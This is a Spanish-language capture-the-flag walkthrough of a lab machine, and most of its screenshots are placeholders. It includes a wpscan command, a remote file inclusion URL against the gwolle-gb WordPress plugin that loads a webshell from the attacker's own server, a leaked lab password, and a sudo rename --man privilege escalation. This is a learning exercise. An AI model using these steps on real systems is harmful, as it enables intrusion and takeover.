Hacemos el escaneo con nmap:
{{pasted_image_20231129154012.png|}}
Esto es lo que corre dentro del puerto 80:
{{pasted_image_20231129154038.png|}}
Hacemos fuzzing y vemos que corre un directorio llamado wordpress:
{{pasted_image_20231129154119.png|}}
Accedemos a dicho directorio, donde vemos que se trata de un wordpress, pero que no le carga correctamente la información:
{{pasted_image_20231129154214.png|}}
Por lo que vemos el código fuente y detectamos un dominio:
{{pasted_image_20231129154238.png|}}
Lo añadimos al /etc/hosts:
{{pasted_image_20231129154309.png|}}
Y ya nos carga bien la página:
{{pasted_image_20231129154325.png|}}
Procedemos a enumerar posibles usuarios y plugins de este wordpress, pero debemos de activar el modo agresivo:
wpscan --url http://192.168.0.37/wordpress -e p --plugins-detection aggressive
{{pasted_image_20231129155224.png|}}
Y tenemos la siguiente ruta:
{{pasted_image_20231129155319.png|}}
Y detectamos la versión:
{{pasted_image_20231129155343.png|}}
Y tenemos en exploitdb un exploit de remote file inclusion:
{{pasted_image_20231129155451.png|}}
Y por aquí tenemos las instrucciones donde se nos dice que tenemos que estar alojando en un servidor web el comando malicioso que queramos ejecutar en la máquina víctima:
{{pasted_image_20231129155536.png|}}
Por lo que nos preparamos el servidor web malicioso donde vamos a estar alojando una webshell:
{{pasted_image_20231129155649.png|}}
{{pasted_image_20231129155706.png|}}
Lo pegamos:
{{pasted_image_20231129193646.png|}}
Pero no funciona, y vemos en la petición del servidor de python que busca otro archivo:
{{pasted_image_20231129194036.png|}}
Por lo que vamos a renombrar la webshell a este mismo nombre:
{{pasted_image_20231129194012.png|}}
Volvemos a levantar un servidor http y hacemos la petición con el nuevo nombre:
{{pasted_image_20231129194111.png|}}
Y ahora vemos el resultado del comando:
http://remote.nyx/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.0.32:8000/shell.php&cmd=whoami
{{pasted_image_20231129194129.png|}}
Obtenemos la reverse shell de revshells url encodeada:
{{pasted_image_20231130100817.png|}}
Lo pegamos y obtenemos la reverse shell:
{{pasted_image_20231130100835.png|}}
{{pasted_image_20231130100846.png|}}
{{pasted_image_20231130100856.png|}}
Y dentro del archivo config.php en el directorio wordpress nos encontramos con unas credenciales:
{{pasted_image_20231130101209.png|}}
Tenemos la contraseña del usuario Tiago:
tiago:WPr00t3d123!
{{pasted_image_20231130101322.png|}}
Tenemos el siguiente binario que podemos ejecutarlo como root:
{{pasted_image_20231130101417.png|}}
Si ejecutamos el menú de ayuda del programa, vemos que podemos ejecutar las páginas man como root:
{{pasted_image_20231130101701.png|}}
Lo ejecutamos y una vez dentro lanzamos el comando de una bash:
sudo /usr/bin/rename --man
{{pasted_image_20231130101750.png|}}
Y ya somos root:
{{pasted_image_20231130101811.png|}}